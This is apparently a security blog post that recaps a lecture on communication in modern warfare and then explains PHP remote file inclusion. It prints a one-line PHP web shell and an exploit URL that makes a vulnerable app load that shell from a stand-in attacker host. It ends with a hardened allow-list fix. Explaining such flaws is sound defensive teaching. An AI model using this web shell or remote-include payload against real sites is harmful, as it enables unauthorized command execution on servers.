The New Face of War & Hacking PHP
A couple of weeks ago I attended a lecture at the Pritzker Military Library given by Bruce Berkowitz. You can actually watch the archived lecture here. The library is about as atypical for a library as it gets. It is essentially a personal collection of 12,000 military-related books and other assorted artifacts donated by a really, really rich guy who spent some time in the Army. It's on the third floor of a commercial building in downtown Chicago, which also happens to house a Chipotle, a whole flock of lawyers (what do you call a bunch of lawyers? a gaggle?) and one of my favorite Indian restaurants.
Anyway, the subject of the lecture was the new ways that wars are being fought now that communication systems have drastically changed. From the Peloponnesian War (great book if you are interested in military history) to the First Gulf War, communication in battle stayed roughly the same. Military units are divided into smaller hierarchical groups, and commands are passed down from the top. Spear-throwing Spartans, English longbowmen, and German 88mm Flak artillerymen all communicated by essentially shouting orders at each other, trying to find the enemy and direct fire at it as accurately as possible. What has changed, and hence the title of the lecture, The New Face of War, is that weapons are now so incredibly accurate that whoever has the best communication system in battle will likely win. Example: when a modern M1A1 Abrams tank fires a shot it has a 90% chance of taking out its target, compared to 10% for a WWII-era M4 Sherman tank. Roughly the same percentages apply to WWII-era bombs dropped from a B-17 versus modern smart bombs, as well as modern infantry equipped with night vision goggles vs. WWII infantry, etc.
So, if the first shot equals a kill most of the time, whoever can find the enemy and point his super accurate weapon at him first will win most of the time. It all comes down to the communication system.
Now, in Mr. Berkowitz's lecture, he was talking about military systems in the aggregate: whoever has the best satellites, comm gear, radio systems, radar, etc. will win the battle. But you can easily apply this to the much narrower field (and one that is more relevant for blog readers) of information security. In today's IT landscape, whoever finds the vulnerable app first wins. If the bad guys realize before your security staff that some dopey developers have stored production data in unsecured test systems (à la CardSystems), you are going to get killed (and in CardSystems' case, literally!). The other point to be made here is who the enemy is. In most cases, the enemy is your own stuff: the split-tunnel VPN you allow into your corporate network, the unpatched boxes on the SIPRNET, the web application that no one bothered to test for security bugs.
Speaking of vulnerable web applications, I have yet to find an application written in PHP that isn't vulnerable. I'm kind of biased, because I usually am asked to assess web apps because they are suspected of being vulnerable. One of the first things to check for when attacking a PHP app is PHP source code injection (more commonly called remote file inclusion). The idea behind PHP source injection is to force the application to load a hostile PHP script from another server controlled by the attacker. With PHP, you can set the value stored in any global variable via a GET request (this is the register_globals behaviour, which was on by default in PHP of that era). If that variable happens to be used in an include construction like so:
include ("$load.php")
You can manipulate the value stored in $load with a simple GET request from a browser:
http://vulnerabledork.com/accnt.php?load=test
If the PHP interpreter attempts to load a file named test and you get an error like so:
Warning: main(): Failed opening 'test' for inclusion
You know the app is vulnerable, because the PHP interpreter is attempting to load a PHP file called "test", which does not exist, so you get the above error. Exploiting this is super easy: stick a PHP script on another server (the vulnerable server must allow outbound port 80 connections, and remote includes must be enabled in its PHP configuration) and point the vulnerable app at it. Create a hostile PHP script (called hostile in this example) that loads the shell interpreter:
<?php system($_GET['cmd']); ?>
And now force the vulnerable program to load our hostile script:
http://vulnerabledork.com/accnt.php?load=http://www.attacker.com/hostile?&cmd=ls
If you get a directory listing of the web root, guess what? You have found the vulnerability, and my guess is that you would have BETTER than a 90% chance of killing your target.
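For contrast, here is the defensive counterpart, added as an example and not code from the original post: the same kind of include driven by an allow-list of known page names instead of the raw $load value, so neither a remote URL nor a path traversal string can ever reach include(). The page names, the pages/ directory and the resolve_page() helper are assumptions for illustration.

```php
<?php
// Added example, not from the original post. Hardened replacement for the
// vulnerable pattern include("$load.php") with a user-controlled $load.
// ALLOWED_PAGES and PAGE_DIR are assumed values for illustration.

// Allow-list of page names the application actually ships.
const ALLOWED_PAGES = ['home', 'accnt', 'history'];

// Base directory holding the includable pages, resolved once.
define('PAGE_DIR', __DIR__ . '/pages');

/**
 * Map an untrusted "load" parameter to a file path, or null if it is not
 * one of the known pages. The path is never built from the raw value, so
 * "http://www.attacker.com/hostile" or "../../etc/passwd" cannot be included.
 */
function resolve_page(string $load): ?string
{
    // Exact, type-strict match only: no prefixes, suffixes or case folding.
    if (!in_array($load, ALLOWED_PAGES, true)) {
        return null;
    }
    $path = PAGE_DIR . '/' . $load . '.php';

    // Belt and braces: confirm the resolved file really sits under PAGE_DIR.
    $real = realpath($path);
    $base = realpath(PAGE_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Read the parameter explicitly from $_GET rather than relying on
// register_globals, and fail closed on anything unexpected.
$load = (isset($_GET['load']) && is_string($_GET['load'])) ? $_GET['load'] : 'home';
$page = resolve_page($load);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

Pairing this with register_globals = Off and allow_url_include = Off in php.ini closes the remote-inclusion path even on a page where a developer forgets the allow-list.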